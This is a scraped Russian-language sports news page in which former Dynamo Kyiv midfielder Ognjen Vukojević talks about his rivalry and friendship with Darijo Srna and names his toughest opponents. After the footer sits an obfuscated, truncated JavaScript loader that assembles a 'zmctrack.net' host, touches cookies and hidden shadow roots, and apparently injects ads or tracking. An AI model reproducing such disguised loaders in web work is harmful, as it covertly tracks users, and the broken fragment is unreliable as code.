«Со Срной мы всегда воевали на футбольном поле»: признание бывшего полузащитника «Динамо»

Также хорват выделил самых неприятных соперников, среди которых Фернандиньо

Бывший хорватский полузащитник киевского "Динамо" Огнен Вукоевич рассказал о своих отношениях с экс-капитаном донецкого "Шахтера", своим соотечественником Дарио Срной. Напомним, что с мая 2019 года Вукоевич является тренером молодежной сборной Хорватии.

"Мы хорошие друзья и знаем друг друга всю жизнь. И мы всегда воевали на футбольном поле, а после игры пожимали руки и шли на ужин. Мы выиграли чемпионат Украины. Желаю и верю, чтобы такой же был чемпионат Украины, как раньше.

Кто был самым неприятным соперником на поле? Срна, Кучер, Хюбшман, Левандовский, Фернандиньо. Согласен со Срной, что дерби есть, когда есть две красные карточки, дриблинг, мастерство, полный стадион. Вот это настоящее дерби, праздник украинского футбола", – признался хорват.

Читайте также: Они кричали "Слава Украине!" в России: знаменитый хорват пообещал найти для "Динамо" игрока-"собаку"

Ранее мы также сообщали, что Вукоевич назвал двух футболистов "Динамо", которые перейдут в "Реал" или "Барселону". В европейских грандах селекционер киевлян видит Миколенко и Цыганкова: "Но не сейчас, а через год-два".

Реклама

Смотрите, как "Динамо" перед паузой в чемпионате переиграло "Александрию"

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

чемпионат Украины
Динамо Киев
Шахтер Донецк
дерби
Огнен Вукоевич
Дарио Срна

Источник:

Официальный сайт ФК "Динамо"

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"УЕФА спускает в Украину белорусский формат: «Шахтер» и «Динамо» будут определять чемпиона по новой схемеФутбол 	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"«Главное, чтобы и Женя был готов»: клуб из УПЛ готов вернуть «Царя» в УкраинуЧУ по футболу 	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"«Для меня Крым – Украина, война на Востоке – агрессия РФ»: игрок «Карпат» извинился за скандальное фотоЧУ по футболу 	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"Карантин в Украине: командам разрешили тренировки на закрытых базахФутбол 	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"«Чего стесняешься, обезьяна, возьми еще»: российский комментатор поделился очередной выходкой Алиева в «Динамо»ЧУ по футболу 	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"«11-метровый – это психология»: Шевченко открыл секрет ударов с точки и назвал лучшего спеца по пенальтиЧУ по футболу

Новости партнеров

Загрузка…

загрузка…

	"Со Срной мы всегда воевали на футбольном поле": признание бывшего полузащитника "Динамо"

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “«Со Срной мы всегда воевали на футбольном поле»: признание бывшего полузащитника «Динамо»”